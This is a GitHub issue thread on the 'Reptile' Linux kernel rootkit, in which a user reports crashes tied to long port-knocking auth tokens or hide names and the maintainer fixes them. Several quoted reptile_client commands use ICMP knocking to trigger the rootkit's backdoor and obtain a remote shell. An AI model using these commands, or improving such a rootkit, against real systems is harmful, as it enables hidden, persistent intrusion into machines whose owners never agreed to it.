f0rb1dd3n / Reptile

LKM Linux rootkit
2.54k stars 571 forks

Some bug may cause the crash. #31

Closed Asuings closed 5 years ago

Asuings commented 6 years ago

Tested on CentOS 6 x64 (using all the default settings).

  1. Set the port-knocking auth token as "hax0r" and use the client as:

       ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r -w s3cr3t

     then you will get a shell. But with

       ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r123 -w s3cr3t

     you can still get a shell. If you try

       ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0rasuhuicsashai155 -w s3cr3t

     (right auth token + some random chars), the system will crash.
  2. If you set the auth token a bit longer than "hax0r", such as "hax0rchsausau", then the port-knocking will not work.
  3. If you set the hide name a bit longer than "reptile", the port-knocking will not work.

Reptile may have a chance to crash RHEL6 using all the default settings. Sorry, I forgot to log the error code. Good luck!

f0rb1dd3n commented 6 years ago

Thanks for reporting that! ;)

I will consider that for the next commits. I will just delay a little because I am a little busy. But I know how to fix this.

thx

f0rb1dd3n commented 6 years ago

@Asuings, I updated, can you test if this still can get a crash? Thx

corefx commented 6 years ago

Hello, I have tested Reptile with the latest commits on Centos 6.9 (x64) and I don't get any crashes on the server side if I use a long auth token or long hide name, but I get a "buffer overflow detected : ./reptile_client terminated" error if I use a command like this:

./reptile_client -t 192.168.1.117 -x icmp -s 192.168.0.2 -l 192.168.1.107 -p 4444 -w s3cr3t -k hax0raaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

This is the only server side crash I got on Centos 6.9.

f0rb1dd3n commented 5 years ago

I updated Reptile and I think these bugs don't exist. So, I will close this issue and if another bug appears, we can reopen this!

;)